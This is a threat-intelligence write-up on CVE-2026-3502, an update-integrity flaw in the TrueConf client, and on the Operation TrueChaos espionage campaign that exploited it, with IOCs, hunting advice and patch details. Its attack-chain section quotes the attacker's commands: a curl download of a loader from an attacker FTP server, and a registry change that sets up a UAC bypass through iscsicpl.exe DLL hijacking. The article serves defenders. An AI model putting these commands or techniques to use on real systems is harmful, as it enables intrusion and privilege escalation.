TrueConf zero-day turned trusted updates into a government espionage backdoor

CVE-2026-3502 (CVSS 7.8) is a zero-day in the TrueConf video conferencing client. The client downloads updates from its on-premises server without verifying integrity or authenticity. An attacker who controls the server can replace the update with an arbitrary executable.

Check Point Research discovered the flaw exploited in the wild by a China-linked threat actor. The campaign, dubbed Operation TrueChaos, targeted government agencies in Southeast Asia through a single compromised server. The attacker delivered the Havoc C2 framework via weaponized updates. Patched in TrueConf 8.5.3 (build 884), added to the CISA KEV catalog.

The product and its trust model

TrueConf is a video conferencing platform serving over 100,000 organisations globally. The platform is most widely used in Russia, with additional presence in East Asia, Europe, and the Americas. Government agencies, defence departments, critical infrastructure operators, and banks are among its customers.

The on-premises deployment model is TrueConf's core differentiator. The server runs entirely within a private LAN without requiring an internet connection. All traffic stays on-site, with offline activation for air-gapped environments. In enterprise deployments, the server manages client updates, creating a trust relationship that is the root of CVE-2026-3502.

The vulnerable code

When the TrueConf client starts, it checks the server for available updates by comparing versions. If the server has a newer build, the client prompts the user to download from:

https://{trueconf_server}/downlods/trueconf_client.exe

The URL maps to C:\Program Files\TrueConf Server\ClientInstFiles\ on the server. The typo ("downlods") is in the actual TrueConf code.

Classification: CWE-494 (Download of Code Without Integrity Check). No digital signature check, no hash validation. The file is downloaded, saved, and executed with the updater process privileges.

An attacker who controls the TrueConf server can replace trueconf_client.exe with any executable. Every connected client that accepts the update prompt runs the payload.

One server typically serves dozens of government agencies in an on-premises deployment. Compromising a single server turns the update mechanism into a malware distribution channel across the entire connected network. The attacker's reach scales with the server's client count.

Attack chain: Operation TrueChaos

Check Point Research published the full chain on March 31, 2026. The campaign targeted government entities in a Southeast Asian country.

Attackers gained control of the TrueConf on-premises server operated by a governmental IT department. This server provided video conferencing to dozens of agencies. The legitimate update was replaced with a weaponized Inno Setup installer. It upgraded clients from 8.5.1 to 8.5.2, the current version at the time, so the update appeared genuine.

When victims launched TrueConf, the client detected a "newer version" and prompted the update. No signature or integrity check stood in the way. The weaponized installer performed a real TrueConf upgrade while dropping two files to C:\ProgramData\PowerISO\:

C:\ProgramData\PowerISO\poweriso.exe  — legitimate PowerISO binary
C:\ProgramData\PowerISO\7z-x64.dll    — Havoc C2 implant

The benign poweriso.exe loaded the malicious 7z-x64.dll through DLL sideloading. The attacker then performed reconnaissance:

tasklist > cache
tracert 8.8.8.8 -h 5

A secondary loader was retrieved from an attacker-controlled FTP server:

curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o <path>
c:\program files\winrar\winrar.exe x update.7z -p <redacted>

The archive contained 7z.exe (legitimate) and iscsiexe.dll (malicious loader). The attacker used a UAC bypass via the Microsoft iSCSI Initiator Control Panel (iscsicpl.exe):

reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<user>\appdata\local\temp" /f
c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe is a legitimate Windows binary that auto-elevates without a UAC prompt. It is vulnerable to DLL search-order hijacking for iscsiexe.dll. The attacker's DLL loaded in the elevated context, a documented LOLBAS technique.

The loader maintained execution of winexec.exe (the renamed poweriso.exe) as persistence. Network communication went to attacker-controlled Havoc C2 servers.

The attack chain is a textbook supply chain compromise with a twist. The attacker did not poison the vendor's build pipeline. They compromised the customer's own on-premises server, the very infrastructure chosen because it keeps data within the organisation's perimeter. The trust model that makes TrueConf attractive for secure environments became the attack vector.

— Artem Safonov, Threat Analyst at AnonHaven

Attribution

Check Point Research assesses with moderate confidence that Operation TrueChaos is associated with a Chinese-nexus threat actor. TTPs match Chinese operations, including DLL sideloading and living-off-the-land binaries. C2 infrastructure sat on Alibaba Cloud and Tencent. Victimology aligned with Chinese strategic interests in Southeast Asia.

ShadowPad, a backdoor associated with multiple Chinese APT groups, targeted the same victim within the same timeframe. Check Point Research previously documented the Amaranth Dragon group using Havoc in espionage campaigns. Havoc plus ShadowPad against the same target suggests a multi-operator approach typical of China-aligned APT operations.

Indicators of compromise

From the Check Point Research report. Files: trueconf_windows_update.exe (MD5: 22e32bcf113326e366ac480b077067cf), iscsiexe.dll (MD5: 9b435ad985b733b64a6d5f39080f4ae0), 7z-x64.dll (MD5: 248a4d7d4c48478dcbeade8f7dba80b3).

C2 infrastructure: 43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197 (FTP and Havoc C2).

Hunt for unsigned trueconf_windows_update.exe binaries. Check for C:\ProgramData\PowerISO\poweriso.exe on systems without PowerISO installed. Look for the registry persistence key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to PowerISO.

Suspicious process chains include trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp → any child executable. Flag poweriso.exe spawning cmd.exe with curl or netstat commands.

Patch and response

Check Point Research responsibly disclosed CVE-2026-3502 to TrueConf. The fix is included in TrueConf 8.5.3 (build 884), released in March 2026. TrueConf is closed-source software, and the specific verification mechanism added in 8.5.3 has not been publicly documented.

CISA added CVE-2026-3502 to the Known Exploited Vulnerabilities catalog.

Context

The pattern has direct parallels to the TeamPCP supply chain campaign we covered this week. In both cases, attackers compromised a trusted update or distribution mechanism to reach downstream targets. The Trivy supply chain compromise poisoned a security scanner, while Operation TrueChaos poisoned a video conferencing updater. Different tools, same principle.

Many TrueConf deployments operate entirely on-premises and are invisible from the public internet. Check Point Research reviewed internet-exposed servers and found deployments concentrated in Russia, with presence in East Asia, Europe, and the Americas. The actual installed base is likely larger than scanning reveals.

The CVSS vector specifies Adjacent Network (AV:A), reflecting the requirement for server compromise or network position. Direct remote exploitation over the internet is not possible without first compromising the server.

Operation TrueChaos has direct parallels to SolarWinds, where attackers compromised an update mechanism to distribute malware downstream. Operation TrueChaos is scoped to individual deployments rather than the vendor's global supply chain. The per-organisation impact is equally devastating. Every endpoint connecting to the compromised server received the weaponized update.

CWE-494, no integrity check on downloaded code. This is not a subtle vulnerability. It is the absence of a basic security control in software deployed by government agencies and defence departments in air-gapped environments. The irony is sharp: the product was chosen for its security properties, and the update channel had none.

— Artem Safonov, Threat Analyst at AnonHaven